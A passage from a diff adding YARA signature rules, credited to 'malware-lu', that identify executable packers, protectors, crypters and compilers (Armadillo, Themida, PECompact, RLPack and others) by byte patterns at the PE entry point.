+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV10XV17XDLLOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 ?? 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeBundlev30standardloader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ProtectionPlusvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorV22Xsoftcompletecom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThinstallVirtualizationSuite30353043ThinstallCompany
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CrunchPEHeuristicAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 0E 00 00 00 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtBorlandC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPACKv405v406
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 06 ?? ?? 8E C0 8B 0E ?? ?? 8B F9 4F 8B F7 FD F3 A4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeStubOEPv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 33 C9 33 D2 B8 ?? ?? ?? 00 B9 FF }
+	$a1 = { E8 05 00 00 00 33 C0 40 48 C3 E8 05 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule EXEShieldv01bv03bv03SMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEArmor049Hying
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 56 52 51 53 55 E8 15 01 00 00 32 ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv14x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PocketPCSHA
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 86 2F 96 2F A6 2F B6 2F 22 4F 43 68 53 6B 63 6A 73 69 F0 7F 0B D0 0B 40 09 00 09 D0 B3 65 A3 66 93 67 0B 40 83 64 03 64 04 D0 0B 40 09 00 10 7F 26 4F F6 6B F6 6A F6 69 0B 00 F6 68 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 22 4F F0 7F 0A D0 06 D4 06 D5 0B 40 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorV1451CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC 58 53 56 57 83 65 DC 00 F3 EB 0C 65 58 50 72 2D 76 2E 31 2E 34 2E 00 A1 00 ?? ?? 00 05 00 ?? ?? 00 A3 08 ?? ?? 00 A1 08 ?? ?? 00 B9 81 ?? ?? 00 2B 48 18 89 0D 0C ?? ?? 00 83 3D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A7 1A 00 00 B9 6C 1A 00 00 BA 20 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD EC 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SuckStopv111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? ?? ?? BE ?? ?? B4 30 CD 21 EB ?? 9B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DEFv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46 }
+	$a1 = { BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? 10 40 00 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule UnnamedScrambler251Beta2252p0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 ?? 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? ?? 40 00 E8 ?? EA FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 BA ?? ?? 40 00 B8 ?? ?? 40 00 E8 63 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? ?? FF FF BA ?? ?? 40 00 8B C3 8B 0D ?? ?? 40 00 E8 ?? ?? FF FF C7 05 ?? ?? 40 00 0A 00 00 00 BB ?? ?? 40 00 BE ?? ?? 40 00 BF ?? ?? 40 00 B8 ?? ?? 40 00 BA 04 00 00 00 E8 ?? EB FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 0A F3 FF FF 89 03 83 3B 00 0F 84 F7 04 00 00 B8 ?? ?? 40 00 8B 16 E8 ?? E1 FF FF B8 ?? ?? 40 00 E8 ?? E0 FF FF 8B D0 8B 03 8B 0E E8 ?? ?? FF FF 8B C7 A3 ?? ?? 40 00 8D 55 EC 33 C0 E8 ?? D3 FF FF 8B 45 EC B9 ?? ?? 40 00 BA ?? ?? 40 00 E8 8B ED FF FF 3C 01 75 2B A1 }
+
+condition:
+		$a0
+}
+	
+	
+rule Crunchv40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector18SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 FF 31 F6 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02Armadillo300Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule hmimyssPEPack01hmimys
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 83 ED 05 6A 00 FF 95 E1 0E 00 00 89 85 85 0E 00 00 8B 58 3C 03 D8 81 C3 F8 00 00 00 80 AD 89 0E 00 00 01 89 9D 63 0F 00 00 8B 4B 0C 03 8D 85 0E 00 00 8B 53 08 80 BD 89 0E 00 00 00 75 0C 03 8D 91 0E 00 00 2B 95 91 0E 00 00 89 8D 57 0F 00 00 89 95 5B 0F 00 00 8B 5B 10 89 9D 5F 0F 00 00 8B 9D 5F 0F 00 00 8B 85 57 0F 00 00 53 50 E8 B7 0B 00 00 89 85 73 0F 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 95 E9 0E 00 00 89 85 6B 0F 00 00 6A 04 68 00 10 00 00 68 D8 7C 00 00 6A 00 FF 95 E9 0E 00 00 89 85 6F 0F 00 00 8D 85 67 0F 00 00 8B 9D 73 0F 00 00 8B 8D 6B 0F 00 00 8B 95 5B 0F 00 00 83 EA 0E 8B B5 57 0F 00 00 83 C6 0E 8B BD 6F 0F 00 00 50 53 51 52 56 68 D8 7C 00 00 57 E8 01 01 00 00 8B 9D 57 0F 00 00 8B 03 3C 01 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv146
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 60 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02XCR011Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 8B F0 33 DB 83 C3 01 83 C0 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPACKLINKv360v364v365or50121
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 ?? ?? ?? 8E C0 8B ?? ?? ?? 8B ?? 4F 8B F7 FD F3 A4 50 B8 ?? ?? 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SpecialEXEPasswordProtectorv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptor15Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? ?? EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeJoiner10Yoda
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV119DllaPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 89 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 3C 04 00 00 EB 0C 8B 85 38 04 00 00 89 85 3C 04 00 00 8D B5 60 04 00 00 8D 9D EB 02 00 00 33 FF E8 52 01 00 00 EB 1B 8B 85 3C 04 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 48 04 00 00 00 74 0E 83 BD 4C 04 00 00 00 74 05 E8 B8 01 00 00 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 D1 03 00 00 89 85 5C 04 00 00 5B FF B5 5C 04 00 00 56 FF D3 83 C4 08 8B B5 5C 04 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 E9 94 00 00 00 56 FF 95 C9 03 00 00 85 C0 0F 84 B4 00 00 00 89 85 54 04 00 00 8B C6 EB 5B 8B 85 58 04 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 58 04 00 00 C7 00 20 20 20 00 EB 06 FF B5 58 04 00 00 FF B5 54 04 00 00 FF 95 CD 03 00 00 85 C0 74 71 89 07 83 C7 04 8B 85 58 04 00 00 EB 01 40 80 38 00 75 FA 40 89 85 58 04 00 00 66 81 78 02 00 80 74 A5 80 38 00 75 A0 EB 01 46 80 3E 00 75 FA 46 40 8B 38 03 BD 3C 04 00 00 83 C0 04 89 85 58 04 00 00 80 3E 01 0F 85 63 FF FF FF 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 5C 04 00 00 FF 95 D5 03 00 00 E8 3D 00 00 00 E8 24 01 00 00 61 E9 ?? ?? ?? ?? 61 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrypKeyV56XKenonicControlsLtd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 00 75 07 6A 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Safe20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 10 53 56 57 E8 C4 01 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule MicrosoftVisualCV80
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB 94 00 00 00 53 6A 00 8B ?? ?? ?? ?? ?? FF D7 50 FF ?? ?? ?? ?? ?? 8B F0 85 F6 75 0A 6A 12 E8 ?? ?? ?? ?? 59 EB 18 89 1E 56 FF ?? ?? ?? ?? ?? 56 85 C0 75 14 50 FF D7 50 FF ?? ?? ?? ?? ?? B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MZ_Crypt10byBrainSt0rm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 25 14 40 00 8B BD 77 14 40 00 8B 8D 7F 14 40 00 EB 28 83 7F 1C 07 75 1E 8B 77 0C 03 B5 7B 14 40 00 33 C0 EB 0C 50 8A A5 83 14 40 00 30 26 58 40 46 3B 47 10 76 EF 83 C7 28 49 0B C9 75 D4 8B 85 73 14 40 00 89 44 24 1C 61 FF E0 }
+
+condition:
+		$a0
+}
+	
+	
+rule EPWv130
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 57 1E 56 55 52 51 53 50 2E 8C 06 08 00 8C C0 83 C0 10 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WindofCrypt10byDarkPressure
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 EC 53 ?? ?? ?? ?? 89 45 EC B8 64 40 00 10 E8 28 EA FF FF 33 C0 55 68 CE 51 00 10 64 ?? ?? ?? ?? 20 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 F6 DB FF FF 8B 45 EC E8 12 E7 FF FF 50 E8 3C EA FF FF 8B D8 83 FB FF 0F 84 A6 00 00 00 6A 00 53 E8 41 EA FF FF 8B F0 81 EE 00 5E 00 00 6A 00 6A 00 68 00 5E 00 00 53 E8 52 EA FF FF B8 F4 97 00 10 8B D6 E8 2E E7 FF FF B8 F8 97 00 10 8B D6 E8 22 E7 FF FF 8B C6 E8 AB D8 FF FF 8B F8 6A 00 68 F0 97 00 10 56 A1 F4 97 00 10 50 53 E8 05 EA FF FF 53 E8 CF E9 FF FF B8 FC 97 00 10 BA E8 51 00 10 E8 74 EA FF FF A1 F4 97 00 10 85 C0 74 05 83 E8 04 8B 00 50 B9 F8 97 00 10 B8 FC 97 00 10 8B 15 F4 97 00 10 E8 D8 EA FF FF B8 FC 97 00 10 E8 5A EB FF FF 8B CE 8B 15 F8 97 00 10 8B C7 E8 EB E9 FF FF 8B C7 85 C0 74 05 E8 E4 EB FF FF 33 C0 5A 59 59 64 89 10 68 D5 51 00 10 8D 45 EC E8 BB E5 FF FF C3 E9 A9 DF FF FF EB F0 5F 5E 5B E8 B7 E4 FF FF 00 00 00 FF FF FF FF 0A 00 00 00 63 5A 6C 56 30 55 6C 6B 70 4D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NTKrnlPackerAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01LCCWin321xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 64 A1 01 00 00 00 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 9A 10 40 90 50 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NME11Publicbyredlime
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 B8 30 35 14 13 E8 9A E6 FF FF 33 C0 55 68 6C 36 14 13 64 FF 30 64 89 20 B8 08 5C 14 13 BA 84 36 14 13 E8 7D E2 FF FF E8 C0 EA FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 04 F8 FF FF 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 F4 F7 FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 2C F9 FF FF A3 F8 5A 14 13 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 17 F9 FF FF A3 FC 5A 14 13 B8 04 5C 14 13 E8 20 FB FF FF 8B D8 85 DB 74 48 B8 00 5B 14 13 8B 15 C4 45 14 13 E8 1E E7 FF FF A1 04 5C 14 13 E8 A8 DA FF FF ?? ?? ?? ?? 5C 14 13 50 8B CE 8B D3 B8 00 5B 14 13 ?? ?? ?? ?? FF 8B C6 E8 DF FB FF FF 8B C6 E8 9C DA FF FF B8 00 5B 14 13 E8 72 E7 FF FF 33 C0 5A 59 59 64 89 10 68 73 36 14 13 C3 E9 0F DF FF FF EB F8 5E 5B E8 7E E0 FF FF 00 00 FF FF FF FF 0C 00 00 00 4E 4D 45 20 31 2E 31 20 53 74 75 62 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEtitev13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv134v140b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 80 40 ?? 87 DD 8B 85 A6 80 40 ?? 01 85 03 80 40 ?? 66 C7 85 ?? 00 80 ?? 40 90 90 01 85 9E 80 ?? 40 BB F8 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakeMSVC70DLLMethod3emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 5E 5B 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }
+	$a1 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SoftProtectSoftProtectbyru
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 E3 60 E8 03 ?? ?? ?? D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 60 E8 03 ?? ?? ?? 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 EB 01 83 9C EB 01 D5 EB 08 35 9D EB 01 89 EB 03 0B EB F7 E8 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 59 83 01 01 80 39 5C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02CDCopsIIAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack118LZMA430ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 ?? 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv108xAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandCDLLMethod2Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARMProtector01bySMoKE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D EB 01 00 81 ED 5E 1F 40 00 EB 02 83 09 8D B5 EF 1F 40 00 EB 02 83 09 BA A3 11 00 00 EB 01 00 8D 8D 92 31 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
